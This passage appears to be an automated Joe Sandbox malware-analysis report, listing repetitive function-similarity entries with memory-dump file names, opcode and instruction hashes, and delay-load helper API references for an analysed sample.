                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2b9191cb3b06f5141f732fc6b30ffe834183c72a5651981ea54819241354172d
                • Instruction ID: a0ccf2d96e655733d490e788f1402472b1f47b77c156155db1f655ec755dde4c
                • Opcode Fuzzy Hash: 2b9191cb3b06f5141f732fc6b30ffe834183c72a5651981ea54819241354172d
                • Instruction Fuzzy Hash: 4CB012A5B7C0416C310C91176D0BF3A075CF3C0B12B30402FB41AD01C0EA445C0D403B
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 34c32ca6068b501effce7485df2e3b30851977dbe65bc92962db7fb97d6550ae
                • Instruction ID: 8bb1fe1868b061dbf307e5dc94e50a504fcd3e58c81e122a66c9ae0b951d507a
                • Opcode Fuzzy Hash: 34c32ca6068b501effce7485df2e3b30851977dbe65bc92962db7fb97d6550ae
                • Instruction Fuzzy Hash: 55B012A5B7C042AC310C91076C0BE3B07ACE3C0B12B30801FB809D11C0EA445C0D403B
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5353d3c704b1bd6665ca54c5c234c3901fd7de56a270bd31c0304154471f8173
                • Instruction ID: fc5a10fbbf445cd42e3155a6e1bc1decb3452cf7856842d052da4c6b0f35594b
                • Opcode Fuzzy Hash: 5353d3c704b1bd6665ca54c5c234c3901fd7de56a270bd31c0304154471f8173
                • Instruction Fuzzy Hash: 48B012A5B7C0826C310C91076D0BE3B0B5CE3C0B12B30801FB509D01C0EA445C0A403B
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6cac0212a7616c57633fc6da27f652a9dcf77b5ad4b1196a47f227423cd67797
                • Instruction ID: 5223383e389bd62a7a1429d33e8cfd882d236097ba7b277594893ad68ff35032
                • Opcode Fuzzy Hash: 6cac0212a7616c57633fc6da27f652a9dcf77b5ad4b1196a47f227423cd67797
                • Instruction Fuzzy Hash: 99B012B5E7C6416C310CA10BAD02D3E076CE3C0B52B30451FB109D01C0D5849C05803E
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 445ea6db668a4ffe2e124de1b6ddf52c97d5a2b1abc5a35d136a6545e4aa877f
                • Instruction ID: b0426b4974869a9d7bb434732cce79d2c711b17b3b0b30ec5376d3ef7cc1a760
                • Opcode Fuzzy Hash: 445ea6db668a4ffe2e124de1b6ddf52c97d5a2b1abc5a35d136a6545e4aa877f
                • Instruction Fuzzy Hash: BFB012B5E6C5416C310CA10BAD02D3E076CD3C4B52B30851FB509D01C0D5845C05803E
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDC36
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8e77a1f8aceaaecf7767b87152d3b938f55f2b797ebaa8426fd6687932600cf0
                • Instruction ID: 43c96b1add61dc3b45860df573d0aa77c3170a2af2f3f0e0dbbff766d5f96755
                • Opcode Fuzzy Hash: 8e77a1f8aceaaecf7767b87152d3b938f55f2b797ebaa8426fd6687932600cf0
                • Instruction Fuzzy Hash: ABB012B5E6C6417C310C6107BF02C3E072CD3C0B52B30461FB105E00C095C45C45903E
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9094ad0ab50640b5d4e963d68ecaf95c3665d353620cbd4c97808f1af94b69ec
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 9094ad0ab50640b5d4e963d68ecaf95c3665d353620cbd4c97808f1af94b69ec
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8f54b90a1e561e1ab52999d9c499a87858eea6b30c1051b0cd31efa89bb6dbe4
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 8f54b90a1e561e1ab52999d9c499a87858eea6b30c1051b0cd31efa89bb6dbe4
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2a91682045564e61384168bf05a07cef5c93b3837e812e862178a4816d5c98c8
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 2a91682045564e61384168bf05a07cef5c93b3837e812e862178a4816d5c98c8
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 79c7dc86dc50eeaacc7a904f7fa2cd6415355593e84f4218773c021432e2f01e
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 79c7dc86dc50eeaacc7a904f7fa2cd6415355593e84f4218773c021432e2f01e
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 1eac69261b3c8ceb30552f79ce6ef49adb7c1fedb9325881bc269621ce998fa1
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 1eac69261b3c8ceb30552f79ce6ef49adb7c1fedb9325881bc269621ce998fa1
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b989510347a1b5a39d2500d512fa5ec768c9416413c595b4e65d0c1e9d98ee88
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: b989510347a1b5a39d2500d512fa5ec768c9416413c595b4e65d0c1e9d98ee88
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5b11bb9518ec7e720eb2a1381431fb27307736d23b5ad52ca94dc585f31eaed5
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 5b11bb9518ec7e720eb2a1381431fb27307736d23b5ad52ca94dc585f31eaed5
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5efecb80e1119e8c486cb417f802be2267d33308542df6e233a889f8b555743f
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 5efecb80e1119e8c486cb417f802be2267d33308542df6e233a889f8b555743f
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2512e09256428d77c344eeff980f315e5b5b72080c596e3bb816d75d6fa0db19
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 2512e09256428d77c344eeff980f315e5b5b72080c596e3bb816d75d6fa0db19
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6d110fe9149bc4c3e2f98217ae1fc21e69420c78aa2961d2c1f1b7ed6fe00ebf
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 6d110fe9149bc4c3e2f98217ae1fc21e69420c78aa2961d2c1f1b7ed6fe00ebf
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 95120c365ff79875e324a8eb56fdc2b23e8154efeeecb74392ea9a83615d1219
                • Instruction ID: 1f968e7a27a51bd87171ee1bd2c4a14d5149e0b256c8724e4b52b597466f7a17
                • Opcode Fuzzy Hash: 95120c365ff79875e324a8eb56fdc2b23e8154efeeecb74392ea9a83615d1219
                • Instruction Fuzzy Hash: B9A01292D6C0437C300871036C52D3A020CD6C0B12330440FB00A900C094441C050439
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
